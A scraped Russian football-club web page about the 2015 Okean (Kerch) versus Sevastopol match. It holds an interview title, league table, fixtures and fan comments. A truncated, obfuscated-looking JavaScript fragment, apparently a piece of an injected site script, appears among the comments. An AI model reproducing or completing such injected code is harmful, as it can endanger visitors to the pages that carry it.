Премьер-лига КФС. 7-й тур. «Океан» (Керчь) – «Севастополь». Интервью Олега Лещинского
- 4 октября 2015 01:23
- Интервью
- Версия для печати
- RSS

Похожие новости

Новости
Турнирная таблица
1. | ![]() |
Победа | 44 |
2. | ![]() |
Севастополь | 43 |
3. | ![]() |
Кубань Холдинг | 42 |
4. | ![]() |
Динамо Ставрополь | 42 |
5. | ![]() |
Ростов-2 | 37 |
6. | ![]() |
Дружба | 33 |
7. | ![]() |
Сочи-2 | 31 |
8. | ![]() |
Астрахань | 30 |
9. | ![]() |
Нарт | 30 |
10. | ![]() |
Легион | 27 |
11. | ![]() |
Рубин Ялта | 25 |
12. | ![]() |
Ангушт | 20 |
13. | ![]() |
Спартак-Нальчик | 14 |
14. | ![]() |
Динамо-2 | 2 |
Ближайшие матчи
- 23.08 в 19:00 Ростов-2 - Севастополь
- 30.08 в 19:00 Севастополь - Динамо Ставрополь
- 06.09 Динамо-2 - Севастополь
- 13.09 Севастополь - Победа
БОМБАРДИРЫ

Дмитрий Иванов
Нападающий
8 мячей

Редван Османов
Нападающий
7 мячей

Станислав Рубан
Нападающий
6 мячей
ИГРОКИ АВГУСТА

Вадим Зубавленко
Полузащитник
средний бал - 5
голосов - 4

Владислав Кучейко
Вратарь
средний бал - 4.5
голосов - 6

Амет Дугу
Полузащитник
средний бал - 4
голосов - 6
ДНИ РОЖДЕНИЯ

Максим Мясников
Полузащитник
18 августа - 19 лет

Роман Задирака
Защитник
22 августа - 19 лет

Юрий Доброволянский
Администратор
23 августа - 65 лет
Комментарии пользователей сайта
Акела_СС (4 октября 2015, 06:45), а что зимой? клуб денег не дал будем работать с тем что есть и бла бла и тд и тп
Ребята,держитесь и не унывайте. У кого не было серых дней...
"Кто бы Севастополь не опускал это две лучшие команды..."
И что ещё после этого слушать?
NEVA (4 октября 2015, 09:11),
Какой может быть лидер у того , чего нет ? Нет команды , есть группа физкультурников. Такое впечатление возникает при визуальном контроле над ситуацией. Еще есть мнение , что руководство клуба не выполнчет свои функции , как следствие этого процесса по принципу домино, не выполняют свои функции и все остальные фигуранты. Может быть меньше всего вопросов к обслуживающему персоналу - футболки и трусы чистые , поле в отличном состоянии. Все остальное - жалкое подобие профессиональной работы.
Макс красавчик. Как гуру пресс-службы, роль ведущего на себя взял. Керчанин сидел и брал уроки мастер-класса )))))
Поле на стадионе в Керчи ужасное. Во всяком случае, по ТВ. Думаю, никто бы из хороших футболистов не смог тут показать нормальную игру.
// t;t++)e+=o.charCodeAt(t).toString(16);re turn e},p=function(){var w=window,p=w.document.location.protocol; if(p.indexOf('http')==0){return p}for(var e=0;e
Не согласен, раслабон во втором тайме был и от этого результат на табло. На данный момент команда просто не готова по многим параметрам биться за первое место. И хватит вспоминать Евпаторию. Прокопенко уже после Евпатории выходил на поле. В команде явно прослеживается пижонство на поле, только не понятно, какие основания для этого. К этому поражению команда шла шесть туров, проиграть должны были еще в Евпатории и тоже во втором тайме. Что то надо менять, тренеру виднее вся надежда на зиму. А то что в команде нет лидера это Лешинский прав.
Ну Лещ, и Евпаторию вспомнил через две недели....
НЕ ГОТОВЫ!!! С такой игрой сражаться за первое место не пойдет. Надеюсь на зимний перерыв ....